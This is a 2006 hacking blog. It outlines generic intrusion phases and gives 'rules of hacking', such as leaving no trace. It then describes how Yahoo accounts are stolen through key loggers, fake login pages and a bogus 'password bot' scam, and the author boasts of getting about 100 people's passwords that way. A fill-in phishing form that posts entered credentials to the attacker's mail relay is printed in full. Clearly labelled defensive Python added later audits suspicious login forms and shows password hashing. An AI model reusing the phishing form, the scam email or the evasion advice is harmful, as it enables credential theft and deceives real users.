Friday, March 31, 2006

Anatomy Of Hack

There are some generic steps that a hacker follows to break into a private network. In this article I describe a generic approach that has long been followed by most hackers around the world. Today's private networks are hardened and well secured from the outside, which makes it very difficult for hackers to get in. But once you find a small hole in the corporate firewall, you can certainly hack into the network, since the rest of the internal network is very soft. This is very similar to an eggshell, which is hard on the outside but soft on the inside.
Footprinting
The first step that a hacker follows is footprinting, where the hacker identifies the target that he needs to attack. In this step he finds the list of available computers that can be hacked. He may enumerate the computers present on his network, or he may get the IP of the target system by some other means. He may get the IP of the target system from an internal employee.


Scanning
In the second step the hacker scans the target system: for example, he scans its ports and finds the MAC address of the target system.

Information Gathering
The third step of hacking is information gathering. In this stage the hacker tries to get as much information as possible about the target system. He finds the operating system running on the target machine, the services running on it that can be exploited, and much more. This is also the step where the hacker collects user names that probably have a blank password or a password that can be easily guessed.

Gaining Access

Gaining access is the next step after the information gathering phase. The hacker gains access to the target machine by means of some exploit, which may be a blank or default password of some user or an application vulnerability, such as the buffer overflow exploits that hackers have used most of the time to gain access to vulnerable machines. Historically, access has been gained using many techniques, including XSS (cross-site scripting) and SQL injection attacks.

Escalating Privilege
When the access gained in the previous step is not privileged enough, the hacker tries to escalate his privileges by exploiting an application-level vulnerability. This is one of the most difficult phases of hacking.

Pilfering
Once the hacker has the right privileges on the target machine, he starts pilfering the required information from it. In this phase the hacker may harm the target machine.


Denial of Service
When the hacker is not able to gain access to the target machine, or is not able to escalate his privileges, he attacks the system with a denial of service. The hacker does this when he gets frustrated by how hardened the system is. It does not benefit the hacker in any sense.

Reference
http://www.microsoft.com/technet/technetmag/issues/2005/01/AnatomyofaHack/




Rule of Hacking

There are some rules I believe must be followed when you are hacking.
Follow these don'ts and do's of hacking.

Don'ts of Hacking
  1. Do not do it the same way as others do.
  2. Do not use a tool for hacking unless you know completely how it works.
  3. Do not leave any trace.
  4. Do not delete or change any data in a way that can harm or cause loss to the victim. (Ethically, do not harm your victim.)
Do's of Hacking
  1. Do it in all possible ways.

Wednesday, March 29, 2006

Yahoo Hacking Bot


Hi Guys,
Today I am going to discuss what I did last week. Before this, let me tell you that I am very much interested in hacking. I mean I want to learn the hacking techniques that were used in the past by other hackers. As part of this, last week I was searching for all the techniques that were used by hackers to hack online web mail accounts like Yahoo.

So I googled and found very few techniques that were used. Most of the techniques were already known to me, like key-loggers, dummy pages and social engineering. Last week, using the social engineering technique, I got the passwords of nearly 100 people on the net. Now let me tell you how these three techniques work and how you can defend yourself.

Key-Loggers

Key loggers are a very cheap kind of hacking utility used by script kiddies. A key logger is software that logs every key press on a particular machine. Using it you can record the keys and get the password for any kind of form-based authentication scheme, irrespective of the authentication technique used by the server program. Form-based authentication means a scheme that takes a user name and password from the user.

So maybe your friend will install a key logger on your machine while you are away from it (and have left it open). Key loggers can also be present on Internet café machines.

Dummy Pages

Dummy pages are false login pages that look very similar to the original page but have a different action value. That is, a dummy page is a fake HTML form whose method is set to POST and whose action is configured so that the information you submit is sent to some e-mail ID. If you try to log in on such a page, your password will be posted to your friend's (the hacker's) e-mail.

Here is a simple example of a dummy page:



<form action="Your SMTP URL" method="POST">
<input type="Hidden" name="to" value="Your email Id">
<input type="Hidden" name="subject" value="Subject of email ">
<input type="text" name="user" value="">
<input type="text" name="pass" value="">
<input type="submit" name="submitbutton" value="">
</form>
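
A defender can check for exactly these tell-tales before trusting a login page. The following is an added example, not code from the original post: it flags any password-collecting form whose action leaves the trusted host or that carries hidden mail-relay fields. The host names, the extra field name "recipient" and the function names are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hidden field names a form-to-mail relay reads ("to" and "subject" are on the
# page's dummy form; "recipient" is an assumed extra).
RELAY_FIELDS = {"to", "subject", "recipient"}
PASSWORD_NAMES = {"pass", "passwd", "password", "pwd"}

class FormCollector(HTMLParser):
    """Collect every <form> with its action and the (type, name) of its inputs."""
    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            self._open["inputs"].append(
                (a.get("type", "text").lower(), a.get("name", "").lower()))
    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def audit_login_forms(html, page_url, trusted_hosts):
    """Return warnings for forms that collect a password on this page."""
    collector = FormCollector()
    collector.feed(html)
    warnings = []
    for form in collector.forms:
        inputs = form["inputs"]
        if not any(t == "password" or n in PASSWORD_NAMES for t, n in inputs):
            continue  # not a credential form
        target = urlparse(urljoin(page_url, form["action"]))
        if target.scheme == "mailto":
            warnings.append("password is mailed via mailto:")
        elif target.hostname not in trusted_hosts:
            warnings.append(f"password is posted to untrusted host {target.hostname}")
        elif target.scheme != "https":
            warnings.append("password is posted without HTTPS")
        if any(t == "hidden" and n in RELAY_FIELDS for t, n in inputs):
            warnings.append("hidden mail-relay fields present")
    return warnings

# Constructed sample shaped like the dummy page above; hosts are placeholders.
DUMMY = ('<form action="http://relay.example.net/send" method="POST">'
         '<input type="Hidden" name="to" value="x@example.net">'
         '<input type="text" name="user"><input type="text" name="pass"></form>')
```

Calling `audit_login_forms(DUMMY, "http://mail.example.org/login.html", {"login.example.com"})` reports both the untrusted target host and the hidden relay fields.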


Social Engineering

The last method that I came across was social engineering, which deceives users by telling them a very easy method to hack Yahoo, described like this:

1. First send a letter to hack_mit_bot@yahoo.com, second within the
Subject heading place the word "Password".
2. Then in the text field place the YahooID of the person that you
want to hack in small letters.
3. Then place your own yahoo account information such as: "My
login:My password" (a semicolon makes it easier for the bot to
recognize). This way the bot can verify that your account actually
exists. And then supplies you with the password for the person's
account that you want it for. Here is example:

To: hack_mit_bot@yahoo.com
Cc:
Bcc:
Subject: Password

YourYahooID@yahoo.co.in:>

So all the people who want to hack someone's Yahoo ID will get hacked themselves.

Can you believe this? This method was posted on the internet a few years back, but I still got many idiots who sent me their passwords.

Reality

Anyone who claims that he can get your Yahoo password is either a damn fool or damn intelligent, someone who can really break the existing algorithms. I say this because the password stored on the Yahoo server is neither your plain password nor an encrypted password; it is a hash of your password, which cannot be decrypted back unless you crack it with a brute-force attack. So guys, even the Yahoo administrator cannot get your password.

But if someone is still hacking your Yahoo mail, it is entirely due to your mistake. I mean either you logged in on a machine that has a keyboard logger, or you entered your password on some dummy page.

So be clever enough that no one can hack your password.
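
The point made under Reality, that the server keeps a hash rather than the password, looks like this in practice. This is an added example, not code from the original post and not Yahoo's actual scheme: salted PBKDF2-HMAC-SHA256 with an assumed iteration count, plus an audit that shows why a commonly used password is still exposed to guessing while a strong one is not.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # assumed work factor for this example

def _derive(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)

def make_record(password):
    """What the server keeps: a per-user random salt and the derived hash."""
    salt = os.urandom(16)
    return {"salt": salt.hex(), "hash": _derive(password, salt).hex()}

def verify(record, attempt):
    """Login check: re-derive from the attempt and compare in constant time."""
    derived = _derive(attempt, bytes.fromhex(record["salt"]))
    return hmac.compare_digest(derived, bytes.fromhex(record["hash"]))

def is_guessable(record, common_passwords):
    """Audit: the hash cannot be reversed, so the only way back is guessing."""
    return any(verify(record, guess) for guess in common_passwords)

# Constructed list of common passwords for the demonstration.
COMMON = ["123456", "password", "qwerty", "letmein"]

if __name__ == "__main__":
    weak = make_record("letmein")
    strong = make_record("violet-Tram-91-kettle")
    print(weak)  # only salt and hash, never the password itself
    print(is_guessable(weak, COMMON), is_guessable(strong, COMMON))
```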